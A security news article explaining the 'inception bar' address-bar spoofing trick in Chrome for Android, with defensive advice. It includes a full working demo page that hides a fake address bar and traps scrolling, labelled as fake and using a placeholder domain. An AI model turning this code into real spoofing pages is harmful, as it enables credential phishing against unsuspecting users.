Sneaky trick could make mobile phishing scams very convincing
A security researcher has discovered a way to trick visitors using mobile browsers into believing they are on an entirely different website, a trick that could be used to create a very convincing phishing scam.
How do you know if you’re on a phishing website that’s trying to steal your login credentials?
Easy: you look at the web address in the address bar at the top of the browser. So, for example, if you are presented with the Facebook login page, you check that the web address is facebook.com. If it is not, you are probably on a phishing webpage.
But what if crooks could edit the address bar to say what they want? Or, better yet, replace the address bar entirely with their own version?
But how?
Security researcher James Fisher found a way that crooks could do just that in Chrome on Android. Mobile browsers like Chrome collapse the address bar once you start scrolling down a webpage, in order to maximise screen space so you can see as much of the website as possible.

Fisher discovered a way to get a malicious webpage to display a fake address bar exactly where the real one disappears as Chrome collapses it. Of course, the webpage is not loading a real address bar: it is just ordinary page content (in Fisher's demo, an image of Chrome's address bar) positioned and styled to look like one. Basically, it is an illusion. Fisher calls it the "inception bar".
What's more, Fisher also found a way to stop the browser from bringing the real address bar back when the user scrolls up again, which is Chrome's usual behaviour. Once the real bar has collapsed, the page moves all of its content into a full-screen scrollable box (a "scroll jail"), so the user is scrolling inside that box rather than the page itself, and Chrome never sees the page-level scroll-up that would reveal the real bar. You can see the trick at work on Fisher's website here.
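To make the mechanism concrete, here is a minimal demo page written for this article; it is an added example and not Fisher's own code. It does the two things described above: it waits for Chrome to collapse its real address bar as the user scrolls, then swaps the page content into a fixed, overflow-scrolling container that carries a fake bar at its top. The fake bar is deliberately labelled as fake and shows the placeholder domain example.invalid, and the 60-pixel scroll threshold is an assumption about roughly how far Chrome scrolls before hiding its toolbar. The effect is only visible in Chrome for Android (and depends on the Chrome version); in a desktop browser nothing collapses and the page simply behaves like a normal scrollable document.

```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Inception bar demo (added example, not Fisher's code)</title>
<style>
  html, body { margin: 0; }

  /* Phase 1: normal page content. The user has to scroll a little before
     Chrome hides its own address bar, so give it something to scroll. */
  #page { padding: 16px; font: 16px sans-serif; min-height: 250vh; }

  /* Phase 2: the "scroll jail". A fixed box filling the viewport whose own
     overflow scrolls. Because the document itself no longer moves, Chrome
     never gets the page-level scroll-up that would bring the real bar back. */
  #jail {
    display: none;
    position: fixed; top: 0; right: 0; bottom: 0; left: 0;
    overflow-y: scroll;
    -webkit-overflow-scrolling: touch;
  }
  #jail.active { display: block; }

  /* The fake bar is ordinary page content styled to resemble a browser bar.
     It is labelled so this demo cannot be mistaken for a real phishing page. */
  #fakebar {
    position: sticky; top: 0;
    background: #eee; border-bottom: 1px solid #ccc;
    padding: 12px 14px; font: 15px sans-serif; color: #333;
  }
  #fakebar .lock { color: #0a0; margin-right: 6px; }
  #jail .content { padding: 16px; font: 16px sans-serif; min-height: 300vh; }
</style>
</head>
<body>
  <div id="page">
    <p>Scroll down a little. On Chrome for Android the real address bar slides
       away; this page then moves into its own scroll container.</p>
  </div>

  <div id="jail">
    <div id="fakebar">
      <span class="lock">&#128274;</span>FAKE ADDRESS BAR (demo) example.invalid
    </div>
    <div class="content">
      <p>You are now scrolling inside a fixed div, not the page. Scrolling up
         here does not tell Chrome to show the real address bar again.</p>
    </div>
  </div>

<script>
  // Assumed threshold: Chrome has usually collapsed its toolbar by the time
  // the page has scrolled about 60 CSS pixels. Once that happens, swap the
  // normal content for the jail and stop listening.
  var SCROLL_THRESHOLD_PX = 60;

  function enterJail() {
    document.getElementById('page').style.display = 'none';
    document.getElementById('jail').classList.add('active');
    // Reset the document scroll so the fixed jail sits cleanly at the top.
    window.scrollTo(0, 0);
    window.removeEventListener('scroll', onScroll);
  }

  function onScroll() {
    if (window.scrollY > SCROLL_THRESHOLD_PX) {
      enterJail();
    }
  }

  window.addEventListener('scroll', onScroll, { passive: true });
</script>
</body>
</html>
```

Save this as an .html file, serve it from any local web server, and open it in Chrome for Android to see the swap happen; the real address bar is still visible when the page first loads and comes back on a reload or in a fresh tab, which is why the trick only works once the user has scrolled.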
In theory, using this trick, crooks could persuade visitors that they are on an entirely different website, which is exactly what a phishing scammer wants.
Fisher calls the trick a security vulnerability in the Chrome mobile browser and suggests Google could get around it by no longer completely collapsing the address bar, so that part of the real bar always stays visible. And how can you protect yourself against it? It can be extremely difficult to spot, depending on how well the trick is implemented; the fake bar only appears after you have scrolled, so if in doubt, reload the page or open a new tab and type the address yourself. The best defence is not to land on these phishing or malicious webpages in the first place: never click on links in emails and messages you were not expecting, and stay familiar with the most common types of phishing scams.
For more information on phishing scams, how they work and how to avoid them, click here.